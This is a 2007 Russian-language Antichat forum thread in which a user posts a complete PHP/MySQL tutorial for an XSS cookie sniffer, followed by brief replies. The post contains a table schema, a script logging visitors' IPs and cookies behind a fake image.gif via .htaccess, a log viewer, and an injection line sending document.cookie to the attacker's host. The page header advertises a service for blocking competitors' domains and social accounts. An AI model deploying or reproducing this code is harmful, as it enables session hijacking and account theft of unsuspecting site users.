Форум АНТИЧАТ - Sniffer _Pantera

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
Sniffer _Pantera_ for Antichat

Опции темы

Поиск в этой теме

Опции просмотра

Sniffer _Pantera_ for Antichat

28.05.2007, 19:35

_Pantera_

Участник форума

Регистрация: 06.10.2006

Сообщений: 226

Провел на форуме:
3025546

Репутация: 1327

Отправить сообщение для _Pantera_ с помощью ICQ

Sniffer _Pantera_ for Antichat

Введение

При изучении атак вида XSS я столкнулся с проблемой - у меня небыло снифера. Я искал готовый снифер в интернете, но ничего дельного не нашел. Пообщавшись с юзерами античата мне дали дельный совет - снифер лутьше написать самому. Я так и сделал. Писал на php+mysql.

Начнем

Для начала создадим базу данных с именем sniffer
а после таблицу data

Цитата:

CREATE TABLE `data` (
`id` INT NOT NULL AUTO_INCREMENT PRIMARY KEY ,
`ip` TEXT NOT NULL ,
`referer` TEXT NOT NULL ,
`qu` TEXT NOT NULL ,
`cookie` TEXT NOT NULL
) ENGINE = MYISAM ;

Сразу после этого напишем config.php

PHP код:


		
			
<?php

  $dbhost = "database";

  $dbuser = "login";

  $dbpass = "password";

  $dbname = "sniffer";



  $db = @mysql_connect($dbhost, $dbuser, $dbpass);

  if (!$db) {

    exit ("<P>Сервер базы данных не доступен</P>" );

  }

  if (!@mysql_select_db($dbname, $db)) {

    exit( "<P>База данных $dbname не доступна</P>" );

  }

?>

ps требует редактирования

Теперь создаем snif.php

PHP код:


		
			
<html>

<head>

<title>Sniffer _Pantera_ for Antichat</title>

</head>

<body>

<?

$ip = UrlDecode(getenv('REMOTE_ADDR'));

$referer = UrlDecode(getenv('HTTP_REFERER'));

$qu = UrlDecode(getenv('QUERY_STRING'));

$cookie=getenv('HTTP_COOKIE');





require_once("config.php");

$query = "INSERT INTO `data` VALUES(NULL, '$ip', '$referer','$qu','$cookie')";

mysql_query($query, $db);

mysql_close($db);

?>

</body>

</html>

ps Именно он будет добавлять записи в базу данных.

Теперь создадим .htaccess:

Цитата:

RewriteEngine On
RewriteRule image.gif snif.php

ps В папку с снифером поместите любой gif рисунок и переименуйте его в image.gif

И наконец создаем log.php

PHP код:


		
			
<html>

<head>

<title>Снифер _Pantera_ for Antichat</title>

</head>

<body>

<?php

include('config.php');

$query = "SELECT * FROM `data` ORDER by `id` DESC";

$result = mysql_query($query);



  while($perem = mysql_fetch_array($result))

  {

echo "<TABLE WIDTH=100% BORDER=1><DIV style='margin-bottom: 15;'>

<tr><td WIDTH=15% bgcolor=#FFCC33><center>ip</center></td><td>".$perem['ip']."</td></tr>

<tr><td WIDTH=15% bgcolor=#FFCC33><center>referer</center></td><td>".$perem['referer']."</td></tr>

<tr><td WIDTH=15% bgcolor=#FFCC33><center>query</center></td><td>".$perem['qu']."</td></tr>

<tr><td WIDTH=15% bgcolor=#FFCC33><center>cookie</center></td><td>".$perem['cookie']."</td></tr></table>";



  }



?>

</body>

</html>

ps Этот файл будет считывать данные из базы данных и выводить их на экран в обратном порядке.

Ну вот собственно и все. Осталось теперь залить эти все файлы на хостинг с поддержкой php+mysql и использовать.

Использовние

Простой вызов по ссылке:
<a href="http://site.ru/image.gif?test">жми тут</a>

Вызов как картинки:
<img src="http://site.ru/image.gif">

Вызов из скрипта:
<script>img = new Image(); img.src = "http://site.ru/image.gif?"+document.cookie;</script>

Заключение

Хочу сказать парочку слов в заключение. Снифер написал для себя, и оформил его по своему вкусу. Если вам он понравиться буду обновлять. Главное пишите каким бы вы его хотели видеть.
C уважением _Pantera_ (С)

28.05.2007, 19:38

}{0TT@БЬ)Ч

Постоянный

Регистрация: 20.01.2006

Сообщений: 302

Провел на форуме:
3536885

Репутация: 447

а разве без mysql ни как?

28.05.2007, 19:39

_Pantera_

Участник форума

Регистрация: 06.10.2006

Сообщений: 226

Провел на форуме:
3025546

Репутация: 1327

Я его писал на свой вкус, можно было сделать с txt-шником.

28.05.2007, 23:55

Knight_of_Darkness

Познающий

Регистрация: 03.02.2007

Сообщений: 94

Провел на форуме:
267066

Репутация: 165

не знаю, по-моему мускуль в сниффере не нужен. ИМХО.
з.ы. рульная у тебя подпись, в точку.

28.05.2007, 23:59

GreenBear

наркоман с медалью

Регистрация: 07.05.2005

Сообщений: 3,704

Провел на форуме:
19975136

Репутация: 4536

Отправить сообщение для GreenBear с помощью ICQ

Цитата:

не знаю, по-моему мускуль в сниффере не нужен. ИМХО.

каждый дрочит как хочет (с)
так что тут дело вкуса )

__________________
Фреймворк для спамера :(
Услуги программирования

29.05.2007, 00:22

Sn@k3

Познавший АНТИЧАТ

Регистрация: 13.04.2006

Сообщений: 1,738

Провел на форуме:
5151669

Репутация: 1198

Отправить сообщение для Sn@k3 с помощью ICQ

Ещё один..... куда их хоть столько, пип, юзаем каника и все в поряде, .....
плин один и тот-же куск кода в разной разметке =\

http://forum.antichat.ru/thread41026.html

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Sniffer	CTTAPTAK	Уязвимости	8	16.12.2006 23:57
What's up with the sniffer?!	SWiSS	Forum for discussion of ANTICHAT	3	13.04.2006 20:42

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход